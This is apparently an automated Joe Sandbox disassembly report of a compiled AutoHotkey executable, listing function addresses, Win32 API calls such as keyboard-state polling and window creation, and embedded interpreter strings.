Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00484A18, Relevance: 1.5, APIs: 1, Instructions: 8

APIs

Part of subcall function 004849ED: GetModuleHandleW.KERNEL32(mscoree.dll,?,00484A25,004011C4,?,00484988,000000FF,0000001E,00000001,00000000,00000000,?,0048AC0F,004011C4,00000001,004011C4), ref: 004849F7
Part of subcall function 004849ED: GetProcAddress.KERNEL32(00000000,CorExitProcess,?,00484A25,004011C4,?,00484988,000000FF,0000001E,00000001,00000000,00000000,?,0048AC0F,004011C4,00000001), ref: 00484A07

ExitProcess.KERNEL32 ref: 00484A29

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0048AC43, Relevance: 1.3, APIs: 1, Instructions: 30sleep

APIs

Part of subcall function 0048E9C3: RtlAllocateHeap.NTDLL(00000008,004719BE,00000000), ref: 0048EA06

Sleep.KERNEL32(00000000,004719BE,004011C4), ref: 0048AC6B

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Non-executed Functions

Function 0045C7A0, Relevance: 145.4, APIs: 70, Strings: 12, Instructions: 1898window

APIs

InvalidateRect.USER32(00000013,?,00000000), ref: 0045F42F

Part of subcall function 00485D47: RtlReAllocateHeap.NTDLL(00000000,00000000,0049555D,00000000), ref: 00485D86
Part of subcall function 00485D47: GetLastError.KERNEL32(?,0048ACA3,00420EBC,0049555D,00000000,00000000,?,004852B4,00000000,00000010,?,?,0048533E,00420EBC,004A15D8,0000000C), ref: 00485DC9
Part of subcall function 00485D47: GetLastError.KERNEL32(?,0048ACA3,00420EBC,0049555D,00000000,00000000,?,004852B4,00000000,00000010,?,?,0048533E,00420EBC,004A15D8,0000000C), ref: 00485DE1

MulDiv.KERNEL32(00000000,00000060,00000060), ref: 0045C8FB
MulDiv.KERNEL32(00000000,00000060,00000060), ref: 0045C929

Part of subcall function 004625E0: SendMessageA.USER32(00000000,00001037,00000000,00000000), ref: 00462606

Part of subcall function 004600C0: __Stoull.NTSTC_LIBCMT ref: 004601BB
Part of subcall function 004600C0: __Stoull.NTSTC_LIBCMT ref: 00460248
Part of subcall function 004600C0: __Stoull.NTSTC_LIBCMT ref: 00460361
Part of subcall function 004600C0: __Stoull.NTSTC_LIBCMT ref: 00460466
Part of subcall function 004600C0: EnableWindow.USER32(?,00000000), ref: 0046049F
Part of subcall function 004600C0: __Stoull.NTSTC_LIBCMT ref: 004604D1
Part of subcall function 004600C0: ShowWindow.USER32(?,-00000001), ref: 0046050E
Part of subcall function 004600C0: __Stoull.NTSTC_LIBCMT ref: 004605C5
Part of subcall function 004600C0: __Stoull.NTSTC_LIBCMT ref: 004606BF
Part of subcall function 004600C0: __Stoull.NTSTC_LIBCMT ref: 004606EC
Part of subcall function 004600C0: __Stoull.NTSTC_LIBCMT ref: 004607E1
Part of subcall function 004600C0: __Stoull.NTSTC_LIBCMT ref: 0046085F
Part of subcall function 004600C0: __Stoull.NTSTC_LIBCMT ref: 00460887
Part of subcall function 004600C0: __Stoull.NTSTC_LIBCMT ref: 004608D3
Part of subcall function 004600C0: SendMessageA.USER32(-000000F2,000000CF,00000000,00000000), ref: 00460995
Part of subcall function 004600C0: __Stoull.NTSTC_LIBCMT ref: 00460BCE
Part of subcall function 004600C0: SendMessageA.USER32(?,000000CC,?,00000000), ref: 00460C18
Part of subcall function 004600C0: SendMessageA.USER32(?,000000CC,00000000,00000000), ref: 00460C3B
Part of subcall function 004600C0: __Stoull.NTSTC_LIBCMT ref: 00460C4E
Part of subcall function 004600C0: __Stoull.NTSTC_LIBCMT ref: 00460CBF
Part of subcall function 004600C0: __Stoull.NTSTC_LIBCMT ref: 00460DC8
Part of subcall function 004600C0: __Stoull.NTSTC_LIBCMT ref: 00460E06
Part of subcall function 004600C0: __Stoull.NTSTC_LIBCMT ref: 00460E74
Part of subcall function 004600C0: __Stoull.NTSTC_LIBCMT ref: 00460EA8
Part of subcall function 004600C0: __Stoull.NTSTC_LIBCMT ref: 00460EDF
Part of subcall function 004600C0: __Stoull.NTSTC_LIBCMT ref: 00460F85
Part of subcall function 004600C0: __Stoull.NTSTC_LIBCMT ref: 0046106B
Part of subcall function 004600C0: SendMessageA.USER32(?,-00001013,00000000,?), ref: 0046111F
Part of subcall function 004600C0: __Stoull.NTSTC_LIBCMT ref: 004611E2
Part of subcall function 004600C0: GetClassInfoExA.USER32(00400000,?,?), ref: 004611FE
Part of subcall function 004600C0: GetWindowLongA.USER32(-000000E6,000000F0), ref: 004614EE
Part of subcall function 004600C0: MulDiv.KERNEL32(00000000,00000060,00000060), ref: 00461808
Part of subcall function 004600C0: GetWindowLongA.USER32(?,000000F0), ref: 00461D04
Part of subcall function 004600C0: SendMessageA.USER32(00000001,00000401,00000001,00000000), ref: 00461E5B
Part of subcall function 004600C0: GetWindowLongA.USER32(00000000,000000F0), ref: 00461E87
Part of subcall function 004600C0: SendMessageA.USER32(?,000000F4,00000000), ref: 00461EAB
Part of subcall function 004600C0: SendMessageA.USER32(?,00000401,?,00000000), ref: 00461ECE
Part of subcall function 004600C0: SendMessageA.USER32(?,0000108E,?,00000000), ref: 00461F6A
Part of subcall function 004600C0: SendMessageA.USER32(?,000000C5,00000000,00000000), ref: 00461FAC
Part of subcall function 004600C0: SendMessageA.USER32(?,00000403,?,00000006), ref: 00461FF5
Part of subcall function 004600C0: SendMessageA.USER32(?,00000408,00000000,00000000), ref: 00462034
Part of subcall function 004600C0: GetWindowRect.USER32(?,?), ref: 0046205B
Part of subcall function 004600C0: SendMessageA.USER32(?,000000F4,?,00000001), ref: 004620A4
Part of subcall function 004600C0: SetLastError.KERNEL32(00000000), ref: 004620A8
Part of subcall function 004600C0: SetWindowLongA.USER32(?,000000F0,?), ref: 004620B8
Part of subcall function 004600C0: GetLastError.KERNEL32(?,000000F0,?), ref: 004620C2
Part of subcall function 004600C0: GetWindowLongA.USER32(00000000,000000F0), ref: 004620D1
Part of subcall function 004600C0: GetWindowLongA.USER32(?,000000EC), ref: 004620E8
Part of subcall function 004600C0: SetLastError.KERNEL32(00000000), ref: 0046211B
Part of subcall function 004600C0: SetWindowLongA.USER32(00000000,000000EC,?), ref: 00462127
Part of subcall function 004600C0: GetLastError.KERNEL32 ref: 00462131
Part of subcall function 004600C0: GetWindowLongA.USER32(?,000000EC), ref: 00462140
Part of subcall function 004600C0: SendMessageA.USER32(?,00001037,00000000,00000000), ref: 00462169
Part of subcall function 004600C0: SendMessageA.USER32(00000000,00001036,00000000,00000000), ref: 00462193
Part of subcall function 004600C0: SendMessageA.USER32(?,00001037,00000000,00000000), ref: 004621A1
Part of subcall function 004600C0: SendMessageA.USER32(00000000,0000041D,00000000,00000000), ref: 0046222B
Part of subcall function 004600C0: SendMessageA.USER32(06060606,00000192,?,?), ref: 004622BA
Part of subcall function 004600C0: SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 004622F5
Part of subcall function 004600C0: InvalidateRect.USER32(?,00000000,00000001), ref: 0046231B

Part of subcall function 004719E0: _vswprintf_s.LIBCMT ref: 00471A13

Part of subcall function 0041F080: _strncpy.LIBCMT ref: 0041F0D2
Part of subcall function 0041F080: __Stoull.NTSTC_LIBCMT ref: 0041F14D
Part of subcall function 0041F080: __Stoull.NTSTC_LIBCMT ref: 0041F310
Part of subcall function 0041F080: __Stoull.NTSTC_LIBCMT ref: 0041F4B6
Part of subcall function 0041F080: __Stoull.NTSTC_LIBCMT ref: 0041F71A
Part of subcall function 0041F080: __Stoull.NTSTC_LIBCMT ref: 0041FC2B
Part of subcall function 0041F080: __Stoull.NTSTC_LIBCMT ref: 0041FFC1
Part of subcall function 0041F080: _strncpy.LIBCMT ref: 00420241

MulDiv.KERNEL32(00000008,00000060,00000060), ref: 0045CFEA

Part of subcall function 00466E80: GetWindowRect.USER32(?,?), ref: 00466E8D
Part of subcall function 00466E80: ScreenToClient.USER32(?,?), ref: 00466EA9
Part of subcall function 00466E80: GetClientRect.USER32(?,00000000), ref: 00466EB7
Part of subcall function 00466E80: GetWindowLongA.USER32(?,000000F0), ref: 00466EC2
Part of subcall function 00466E80: SetWindowLongA.USER32 ref: 00466EEE
Part of subcall function 00466E80: SendMessageA.USER32(?,00001328,00000000,00000000), ref: 00466F09
Part of subcall function 00466E80: SetWindowLongA.USER32(?,000000F0,00000000), ref: 00466F18
Part of subcall function 00466E80: SendMessageA.USER32(00000000,0000132C,00000000,00000000), ref: 00466F2A

MulDiv.KERNEL32(00000000,00000060,00000060), ref: 0045D124
GetDC.USER32(?), ref: 0045D200
SelectObject.GDI32(00000000,?), ref: 0045D21E
GetTextMetricsA.GDI32(00000000,?), ref: 0045D231
MulDiv.KERNEL32(00000008,00000060,00000060), ref: 0045D2A5
GetSystemMetrics.USER32(00000003), ref: 0045D2BE
MulDiv.KERNEL32(-00000002,00000060,00000060), ref: 0045D2EA
MulDiv.KERNEL32(0000001E,00000060,00000060), ref: 0045D326
GetDC.USER32(?), ref: 0045D39D
SelectObject.GDI32(00000000,?), ref: 0045D3BB
GetTextMetricsA.GDI32(00000000,?), ref: 0045D3CE
GetSystemMetrics.USER32(00000002), ref: 0045D3EE
GetDC.USER32(?), ref: 0045D449
SelectObject.GDI32(00000000,?), ref: 0045D467
GetTextMetricsA.GDI32(00000000,?), ref: 0045D4A3
GetSystemMetrics.USER32(00000047), ref: 0045D4AB
GetSystemMetrics.USER32(00000005), ref: 0045D4DB
GetSystemMetrics.USER32(00000006), ref: 0045D4EB
DrawTextA.USER32(?,?,000000FF,?,?), ref: 0045D6B9
DrawTextA.USER32(00000000,?,000000FF,?,00000400), ref: 0045D6F4
GetCharABCWidthsA.GDI32(00000000,00000000,00000000,?), ref: 0045D760
MulDiv.KERNEL32(00000008,00000060,00000060), ref: 0045D7B6
GetSystemMetrics.USER32(00000003), ref: 0045D7CF
GetSystemMetrics.USER32(0000002D), ref: 0045D827
MulDiv.KERNEL32(00000000,00000060,00000060), ref: 0045D87F
MulDiv.KERNEL32(00000000,00000060,00000060), ref: 0045D8E5

Part of subcall function 00466570: MulDiv.KERNEL32(?,00000060,00000060), ref: 00466598
Part of subcall function 00466570: MulDiv.KERNEL32(?,00000060,00000060), ref: 004665AE

GetDC.USER32(?), ref: 0045D97E
SelectObject.GDI32(00000000,?), ref: 0045D99A
GetTextMetricsA.GDI32(00000000,?), ref: 0045D9B1
MulDiv.KERNEL32(00000008,00000060,00000060), ref: 0045D9C2
GetSystemMetrics.USER32(00000003), ref: 0045D9EA
IsWindowVisible.USER32(?), ref: 0045DA82
IsIconic.USER32(?), ref: 0045DA90
GetWindowLongA.USER32(?,000000F0), ref: 0045DABC
SendMessageA.USER32(?,0000130B,00000000,00000000), ref: 0045DAD5
CreateWindowExA.USER32(?,static,?,?,?,?,?,80000000,?,-00000003,00400000,00000000), ref: 0045DB54
CreateWindowExA.USER32(?,static,?,?,?,?,80000000,80000000,?,?,00400000,00000000), ref: 0045DC1A

Part of subcall function 004628B0: SendMessageA.USER32(?,00000172,00000002,00000000), ref: 004628FE
Part of subcall function 004628B0: DestroyCursor.USER32(00000000), ref: 00462901
Part of subcall function 004628B0: SendMessageA.USER32(?,00000172,00000000,00000000), ref: 00462913
Part of subcall function 004628B0: DeleteObject.GDI32(00000000), ref: 00462916
Part of subcall function 004628B0: DestroyCursor.USER32(?), ref: 00462950
Part of subcall function 004628B0: GetWindowLongA.USER32(?,000000F0), ref: 00462960
Part of subcall function 004628B0: SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 00462990
Part of subcall function 004628B0: SendMessageA.USER32(?,00000172,?,?), ref: 004629A3
Part of subcall function 004628B0: SendMessageA.USER32(00000000,00000173,?,00000000), ref: 004629B0
Part of subcall function 004628B0: DeleteObject.GDI32(?), ref: 004629C4
Part of subcall function 004628B0: DestroyCursor.USER32(?), ref: 004629CC

CreateWindowExA.USER32(?,button,?,?,?,?,?,80000000,?,?,00400000,00000000), ref: 0045DCA8
CreateWindowExA.USER32(?,button,?,?,?,?,?,80000000,?,?,00400000,00000000), ref: 0045DCFB
GetWindowLongA.USER32(?,000000F0), ref: 0045DD2D
SendMessageA.USER32(?,000000F4,00000000), ref: 0045DD51
SendMessageA.USER32(?,00000401,-00000003,00000000), ref: 0045DD70
SendMessageA.USER32(?,000000F4,00000001,00000001), ref: 0045DD83
CreateWindowExA.USER32(?,button,?,?,?,?,?,80000000,?,7619AD28,00400000,00000000), ref: 0045DDCF
SendMessageA.USER32(00000000,000000F1,?,00000000), ref: 0045DDF8
CreateWindowExA.USER32(?,Combobox,004987E9,00000001,?,?,?,80000000,?,7619AD28,00400000,00000000), ref: 0045DE5A
SendMessageA.USER32(00000000,00000030,?,00000000), ref: 0045DE8B
SendMessageA.USER32(00000000,00000154,00000000,00000000), ref: 0045DEAA
MulDiv.KERNEL32(00000008,00000060,00000060), ref: 0045DED5
MulDiv.KERNEL32(00000008,00000060,00000060), ref: 0045DF10
MoveWindow.USER32(?,?,?,?,80000000,00000001), ref: 0045DF58
SelectObject.GDI32(?,?), ref: 0045E6AA
ReleaseDC.USER32(?,?), ref: 0045E6B5
SetWindowPos.USER32(?,?,00000000,00000000,00000000,00000000,00000013), ref: 0045F44C

Part of subcall function 00466470: CheckRadioButton.USER32(00000006,?,?,-00000004), ref: 004664A8
Part of subcall function 00466470: SendMessageA.USER32(?,000000F1,00000000,00000000), ref: 004664F5
Part of subcall function 00466470: GetWindowLongA.USER32(00000000,000000F0), ref: 00466502
Part of subcall function 00466470: SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 00466511

Part of subcall function 00473E10: __ultow.LIBCMT ref: 00473E22

Part of subcall function 00473B50: LoadLibraryA.KERNEL32(uxtheme), ref: 00473B5C
Part of subcall function 00473B50: GetProcAddress.KERNEL32(00000000,SetWindowTheme,?,?), ref: 00473B6E
Part of subcall function 00473B50: FreeLibrary.KERNEL32(00000000,?,?), ref: 00473B8C

SendMessageA.USER32(?,00000030,?,?), ref: 0045F28C
SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0045F2A6
SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000013), ref: 0045F462

Part of subcall function 00462640: SendMessageA.USER32(?,00001304,00000000,00000000), ref: 0046267E
Part of subcall function 00462640: GetWindowLongA.USER32(?,000000F0), ref: 004626AD
Part of subcall function 00462640: SendMessageA.USER32(?,?,00000000,?), ref: 00462736
Part of subcall function 00462640: SendMessageA.USER32(?,0000101B,?,?), ref: 00462771
Part of subcall function 00462640: SendMessageA.USER32(?,?,00000000,00000000), ref: 004627CD
Part of subcall function 00462640: SendMessageA.USER32(?,0000108F,00000000,00000000), ref: 00462803
Part of subcall function 00462640: GetWindowLongA.USER32(?,000000F0), ref: 0046280A
Part of subcall function 00462640: SendMessageA.USER32(?,0000101E,00000000,0000FFFE), ref: 0046282E
Part of subcall function 00462640: SendMessageA.USER32(?,0000130C,?,00000000), ref: 00462850
Part of subcall function 00462640: SendMessageA.USER32(?,0000014E,00000001,?), ref: 0046286E
Part of subcall function 00462640: SendMessageA.USER32(0000014E,0000014E,?,00000000), ref: 00462880

GetClientRect.USER32(?,?), ref: 0045F2EF
SetWindowLongA.USER32(?,000000F0,?), ref: 0045F319
SendMessageA.USER32(?,00001328,00000001,?), ref: 0045F32F
SetWindowLongA.USER32(?,000000F0,?), ref: 0045F344
MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0045F378
GetWindowRect.USER32(?,?), ref: 0045F38E
SendMessageA.USER32(?,00000194,?,00000000), ref: 0045F3E7
GetWindowRect.USER32(?,?), ref: 0045F40B
MapWindowPoints.USER32(00000000,00000013,?,00000002), ref: 0045F41E

Strings

</a>, xrefs: 0045D645
Button%s, xrefs: 0045CD92
Too many controls., xrefs: 0045C7D6
Too many tab controls., xrefs: 0045C860
static, xrefs: 0045DB4E, 0045DC14
@, xrefs: 0045F24F
Can't create control., xrefs: 0045E6CA
Combobox, xrefs: 0045DE54
@,, xrefs: 0045D439
@, xrefs: 0045D47C
button, xrefs: 0045DCA2, 0045DCF5, 0045DDC9
Too many status bars., xrefs: 0045C895

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 004161B0, Relevance: 128.5, APIs: 26, Strings: 46, Instructions: 2470

APIs

FindResourceA.KERNEL32 ref: 00416262
FindResourceA.KERNEL32(00000000,>AHK WITH ICON<,0000000A), ref: 00416272
SizeofResource.KERNEL32(00000000,00000000), ref: 00416282
LoadResource.KERNEL32(00000000,00000000), ref: 00416299
LockResource.KERNEL32(00000000), ref: 004162A8

Part of subcall function 004148B0: GetCPInfo.KERNEL32(000004E4,?,?,004162C6), ref: 004148E1

Part of subcall function 0046F550: GetCPInfo.KERNEL32(0000FDE9,?,?,004162E2,0000000C), ref: 0046F595
Part of subcall function 0046F550: GetCPInfo.KERNEL32(0000FDE9,?,?,004162E2,0000000C), ref: 0046F62F

Part of subcall function 004184A0: __Stoull.NTSTC_LIBCMT ref: 0041850C
Part of subcall function 004184A0: __Stoull.NTSTC_LIBCMT ref: 0041856A

__Stoull.NTSTC_LIBCMT ref: 00416332
__Stoull.NTSTC_LIBCMT ref: 00416380

Part of subcall function 00485220: __mbsnbicmp_l.LIBCMT ref: 00485230

Part of subcall function 00418630: __Stoull.NTSTC_LIBCMT ref: 00418A49
Part of subcall function 00418630: __Stoull.NTSTC_LIBCMT ref: 00418A64
Part of subcall function 00418630: __Stoull.NTSTC_LIBCMT ref: 00418A88
Part of subcall function 00418630: __Stoull.NTSTC_LIBCMT ref: 00418AAB
Part of subcall function 00418630: _strncpy.LIBCMT ref: 00418D52
Part of subcall function 00418630: __Stoull.NTSTC_LIBCMT ref: 00418E01
Part of subcall function 00418630: _strncpy.LIBCMT ref: 00419298
Part of subcall function 00418630: GetKeyboardLayout.USER32(00000000), ref: 0041942F

__Stoull.NTSTC_LIBCMT ref: 004163F2
__Stoull.NTSTC_LIBCMT ref: 0041645F
__Stoull.NTSTC_LIBCMT ref: 004165F5
__Stoull.NTSTC_LIBCMT ref: 0041660E
__Stoull.NTSTC_LIBCMT ref: 004166AA
__Stoull.NTSTC_LIBCMT ref: 0041677F
_strncpy.LIBCMT ref: 0041679D
__Stoull.NTSTC_LIBCMT ref: 00416861
__Stoull.NTSTC_LIBCMT ref: 00416880

Part of subcall function 0041E290: __Stoull.NTSTC_LIBCMT ref: 0041E316

Part of subcall function 0041D7B0: _strncpy.LIBCMT ref: 0041D936
Part of subcall function 0041D7B0: _strncpy.LIBCMT ref: 0041DE0E

__Stoull.NTSTC_LIBCMT ref: 00416D63
__Stoull.NTSTC_LIBCMT ref: 00416D77

Part of subcall function 00416120: __Stoull.NTSTC_LIBCMT ref: 0041612B

__Stoull.NTSTC_LIBCMT ref: 00416F8F

Part of subcall function 0040B610: _strncpy.LIBCMT ref: 0040B633

GetKeyboardLayout.USER32(00000000), ref: 004173EF
VkKeyScanExA.USER32(?,00000000), ref: 00417421
GetKeyboardLayout.USER32(00000000), ref: 0041762D
VkKeyScanExA.USER32(?,00000000), ref: 00417685

Part of subcall function 004123B0: MapVirtualKeyA.USER32(-0000011D,00000001), ref: 00412438

IsCharUpperA.USER32(00000000), ref: 0041778A
_strncpy.LIBCMT ref: 004177CB
_strncpy.LIBCMT ref: 004177EA

Part of subcall function 0040BE10: _strncpy.LIBCMT ref: 0040BFEB
Part of subcall function 0040BE10: _strncpy.LIBCMT ref: 0040C075

Part of subcall function 004719A0: _vswprintf_s.LIBCMT ref: 004719B9

Part of subcall function 004847B8: HeapFree.KERNEL32(00000000,00000000), ref: 004847CE
Part of subcall function 004847B8: GetLastError.KERNEL32(00000000,?,00488A13,00000000,?,0048A041,00000100,004719BE), ref: 004847E0

Part of subcall function 00419D60: __Stoull.NTSTC_LIBCMT ref: 00419E16
Part of subcall function 00419D60: __Stoull.NTSTC_LIBCMT ref: 00419E5C
Part of subcall function 00419D60: __Stoull.NTSTC_LIBCMT ref: 00419E7D
Part of subcall function 00419D60: __Stoull.NTSTC_LIBCMT ref: 0041A5B4
Part of subcall function 00419D60: __Stoull.NTSTC_LIBCMT ref: 0041A710
Part of subcall function 00419D60: __Stoull.NTSTC_LIBCMT ref: 0041A743
Part of subcall function 00419D60: __Stoull.NTSTC_LIBCMT ref: 0041A7AD
Part of subcall function 00419D60: __Stoull.NTSTC_LIBCMT ref: 0041A840
Part of subcall function 00419D60: __Stoull.NTSTC_LIBCMT ref: 0041A885
Part of subcall function 00419D60: __Stoull.NTSTC_LIBCMT ref: 0041A8AE
Part of subcall function 00419D60: __Stoull.NTSTC_LIBCMT ref: 0041A8DD
Part of subcall function 00419D60: __Stoull.NTSTC_LIBCMT ref: 0041ADC4

Strings

*%s up::, xrefs: 00417E4E
Not a valid method, class or property definition., xrefs: 00417F9E, 00417FAB, 00417FE6
IfWin should be #IfWin., xrefs: 0041806C
*%s::, xrefs: 00417D3B
?*- , xrefs: 004165AF
Duplicate hotkey., xrefs: 004180E3
>AHK WITH ICON<, xrefs: 0041626C
Return, xrefs: 0041785F
,, xrefs: 00417843
and, xrefs: 004166A4
Join, xrefs: 00416771
>AUTOHOTKEY SCRIPT<, xrefs: 00416230
Hotkeys/hotstrings are not allowed inside functions., xrefs: 00417FF7
#CommentFlag, xrefs: 0041636C
Missing "{", xrefs: 00417F87, 00417F97, 00418198, 004181A5
Note: The hotkey %s will not be active because it does not exist in the current keyboard layout., xrefs: 00417A17
Up, xrefs: 004172D6, 00417503
& , xrefs: 00416607
if not GetKeyState("%s"), xrefs: 00417D9B
Missing "}", xrefs: 00418191, 004181EA
@, xrefs: 004175F8
Functions cannot contain functions., xrefs: 00417FBF
Continuation section too long., xrefs: 00417F63
OnClipboardChange, xrefs: 00417C2A
%s%s, xrefs: 004177A0
This line does not contain a recognized action., xrefs: 004180FF
Set, xrefs: 00416D71
This hotstring is missing its abbreviation., xrefs: 004180C5
{LCtrl up}, xrefs: 00417DF7
LTrim, xrefs: 0041685B
{RCtrl up}, xrefs: 00417DF0, 00417E0C
<>=/|^,:.+-*&!?~, xrefs: 00416559
Static, xrefs: 00416F89
{Blind}{%s Up}, xrefs: 00417ED2
Get, xrefs: 00416D5D
Duplicate label., xrefs: 00417B88
Out of memory., xrefs: 00417C1A, 00417F47, 004180EE
<>=/|^,:, xrefs: 004166E1
PIA, xrefs: 0041718E, 00418011, 0041807C, 00418110
Missing ")", xrefs: 0041814C
@, xrefs: 004173BE
Not a valid property getter/setter., xrefs: 00417FDC
RTrim, xrefs: 0041687A
{Blind}%s%s{%s DownTemp}, xrefs: 00417E0D
Could not extract script from EXE., xrefs: 00418219
pGA, xrefs: 004171BE, 0041803F, 004180A6

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0040D4E0, Relevance: 122.1, APIs: 57, Strings: 12, Instructions: 1318keyboardthreadwindow

APIs

__Stoull.NTSTC_LIBCMT ref: 0040D510
GetForegroundWindow.USER32 ref: 0040E57E

Part of subcall function 00408BC0: CloseHandle.KERNEL32(00000000), ref: 00408BD3
Part of subcall function 00408BC0: CreateMutexA.KERNEL32(00000000,00000000,AHK Keybd,?,001BC918,?,0040D550), ref: 00408BDE
Part of subcall function 00408BC0: GetLastError.KERNEL32 ref: 00408BE6
Part of subcall function 00408BC0: CloseHandle.KERNEL32(00000000), ref: 00408C0D

Part of subcall function 00408C20: CloseHandle.KERNEL32(00000000), ref: 00408C33
Part of subcall function 00408C20: CreateMutexA.KERNEL32(00000000,00000000,AHK Mouse,?,001BC918,?,0040D55D), ref: 00408C3E
Part of subcall function 00408C20: GetLastError.KERNEL32 ref: 00408C46
Part of subcall function 00408C20: CloseHandle.KERNEL32(00000000), ref: 00408C6D

GetWindowThreadProcessId.USER32(?,00000000), ref: 0040D5C2

Part of subcall function 00476550: GetModuleHandleA.KERNEL32(user32,IsHungAppWindow,?,004755DA), ref: 00476576
Part of subcall function 00476550: GetProcAddress.KERNEL32(00000000,?,004755DA), ref: 0047657D
Part of subcall function 00476550: SendMessageTimeoutA.USER32(00000000,00000000,00000000,00000000,00000002,00001388,00000000), ref: 004765AF

AttachThreadInput.USER32(00000E10,00000000,00000001), ref: 0040D5F8
GetTickCount.KERNEL32 ref: 0040D618
GetCurrentThreadId.KERNEL32 ref: 0040D64F
GetAsyncKeyState.USER32(0000005B), ref: 0040D688
GetAsyncKeyState.USER32(0000005C), ref: 0040D696
GetForegroundWindow.USER32 ref: 0040D6F2
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0040D6FF
GetKeyboardLayout.USER32(00000000), ref: 0040D708

Part of subcall function 00411970: VkKeyScanExA.USER32(00000020,00000000), ref: 004119F6

Part of subcall function 00411440: GetAsyncKeyState.USER32(000000A0), ref: 00411465
Part of subcall function 00411440: GetAsyncKeyState.USER32(000000A1), ref: 00411478
Part of subcall function 00411440: GetAsyncKeyState.USER32(000000A2), ref: 0041148C
Part of subcall function 00411440: GetAsyncKeyState.USER32(000000A3), ref: 004114A0
Part of subcall function 00411440: GetAsyncKeyState.USER32(000000A4), ref: 004114B4
Part of subcall function 00411440: GetAsyncKeyState.USER32(000000A5), ref: 004114C8
Part of subcall function 00411440: GetAsyncKeyState.USER32(0000005B), ref: 004114D9
Part of subcall function 00411440: GetAsyncKeyState.USER32(0000005C), ref: 004114EA

GetTickCount.KERNEL32 ref: 0040D757
GetWindowThreadProcessId.USER32(00000000), ref: 0040E585

Part of subcall function 00410C30: GetKeyState.USER32(?), ref: 00410C3B
Part of subcall function 00410C30: GetKeyState.USER32(?), ref: 00410C6A
Part of subcall function 00410C30: GetForegroundWindow.USER32 ref: 00410CA4
Part of subcall function 00410C30: GetWindowThreadProcessId.USER32(00000000), ref: 00410CAB
Part of subcall function 00410C30: GetKeyState.USER32(00000014), ref: 00410CEE

GetModuleHandleA.KERNEL32(user32,BlockInput), ref: 0040D88C
GetProcAddress.KERNEL32(00000000), ref: 0040D893
GetTickCount.KERNEL32 ref: 0040D8E1
PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0040D906
GetTickCount.KERNEL32 ref: 0040D930
__Stoull.NTSTC_LIBCMT ref: 0040DA37
__Stoull.NTSTC_LIBCMT ref: 0040DA4B
__Stoull.NTSTC_LIBCMT ref: 0040DA84

Part of subcall function 00485220: __mbsnbicmp_l.LIBCMT ref: 00485230

Part of subcall function 00410200: GetCursorPos.USER32(004A9140), ref: 00410298
Part of subcall function 00410200: GetCursorPos.USER32(?), ref: 004102B5
Part of subcall function 00410200: GetSystemMetrics.USER32(00000000), ref: 00410310
Part of subcall function 00410200: GetSystemMetrics.USER32(00000001), ref: 00410316
Part of subcall function 00410200: GetCursorPos.USER32(?), ref: 00410375

__Stoull.NTSTC_LIBCMT ref: 0040DB33
__Stoull.NTSTC_LIBCMT ref: 0040DBA2
__Stoull.NTSTC_LIBCMT ref: 0040DBBC
PostMessageA.USER32(?,00000102,?,00000000), ref: 0040DD0A
GetAsyncKeyState.USER32(000000A0), ref: 0040DDA2
GetAsyncKeyState.USER32(000000A1), ref: 0040DDB5
GetAsyncKeyState.USER32(000000A2), ref: 0040DDC9
GetAsyncKeyState.USER32(000000A3), ref: 0040DDDD
GetAsyncKeyState.USER32(000000A4), ref: 0040DDF1
